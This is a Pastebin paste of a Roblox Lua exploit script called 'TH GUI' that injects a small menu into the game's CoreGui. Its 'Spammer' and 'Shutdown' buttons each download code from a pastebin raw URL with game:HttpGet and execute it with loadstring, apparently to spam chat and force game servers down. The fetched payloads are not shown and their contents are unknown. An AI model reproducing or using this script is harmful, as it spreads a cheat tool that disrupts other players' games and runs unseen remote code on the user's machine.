Advertisement
Guest User

Untitled

a guest
Apr 8th, 2018
84
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.11 KB | None | 0 0
  1. -- Farewell infortality
  2. -- Revamp by ImFrostic, Version 2.8
  3.  
  4. -- Objects
  5.  
  6. local THGUI = Instance.new("ScreenGui")
  7. local THGUISCREEN = Instance.new("Frame")
  8. local label = Instance.new("TextBox")
  9. local Spammer = Instance.new("TextButton")
  10. local Shutdown = Instance.new("TextButton")
  11.  
  12. -- Properties
  13.  
  14. THGUI.Name = "TH GUI "
  15. THGUI.Parent = game.CoreGui
  16.  
  17. THGUISCREEN.Name = "TH GUI SCREEN"
  18. THGUISCREEN.Parent = THGUI
  19. THGUISCREEN.Active = true
  20. THGUISCREEN.BackgroundColor3 = Color3.new(0.392157, 0, 0.196078)
  21. THGUISCREEN.BorderSizePixel = 0
  22. THGUISCREEN.Position = UDim2.new(0.190307319, 0, 0.177449182, 0)
  23. THGUISCREEN.Selectable = true
  24. THGUISCREEN.Size = UDim2.new(0, 102, 0, 206)
  25.  
  26. label.Name = "label"
  27. label.Parent = THGUISCREEN
  28. label.BackgroundColor3 = Color3.new(0, 0, 0)
  29. label.BorderSizePixel = 0
  30. label.Selectable = false
  31. label.Size = UDim2.new(0, 102, 0, 26)
  32. label.Font = Enum.Font.SourceSans
  33. label.Text = "TH GUI"
  34. label.TextColor3 = Color3.new(1, 0, 0.00784314)
  35. label.TextScaled = true
  36. label.TextSize = 14
  37. label.TextWrapped = true
  38.  
  39. Spammer.Name = "Spammer"
  40. Spammer.Parent = THGUISCREEN
  41. Spammer.BackgroundColor3 = Color3.new(0.392157, 0, 0.196078)
  42. Spammer.BorderColor3 = Color3.new(0.666667, 1, 0)
  43. Spammer.Position = UDim2.new(0.0882352591, 0, 0.315533966, 0)
  44. Spammer.Size = UDim2.new(0, 84, 0, 29)
  45. Spammer.Font = Enum.Font.SourceSans
  46. Spammer.Text = "Spammer"
  47. Spammer.TextColor3 = Color3.new(1, 0, 0)
  48. Spammer.TextSize = 14
  49.  
  50. Shutdown.Name = "Shutdown"
  51. Shutdown.Parent = THGUISCREEN
  52. Shutdown.BackgroundColor3 = Color3.new(0.392157, 0, 0.196078)
  53. Shutdown.BorderColor3 = Color3.new(0.666667, 1, 0)
  54. Shutdown.Position = UDim2.new(0.0882352591, 0, 0.611650467, 0)
  55. Shutdown.Size = UDim2.new(0, 84, 0, 29)
  56. Shutdown.Font = Enum.Font.SourceSans
  57. Shutdown.Text = "Shutdown"
  58. Shutdown.TextColor3 = Color3.new(1, 0, 0)
  59. Shutdown.TextSize = 14
  60.  
  61. -- Scripts
  62.  
  63. Spammer.MouseButton1Down:connect(function()
  64. loadstring(game:HttpGet(('https://pastebin.com/raw/MTLH5NG6'),true))()()
  65. end)
  66.  
  67.  
  68.  
  69. Shutdown.MouseButton1Down:connect(function()
  70. loadstring(game:HttpGet(('https://pastebin.com/raw/KN2HX5Ai'),true))()
  71. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement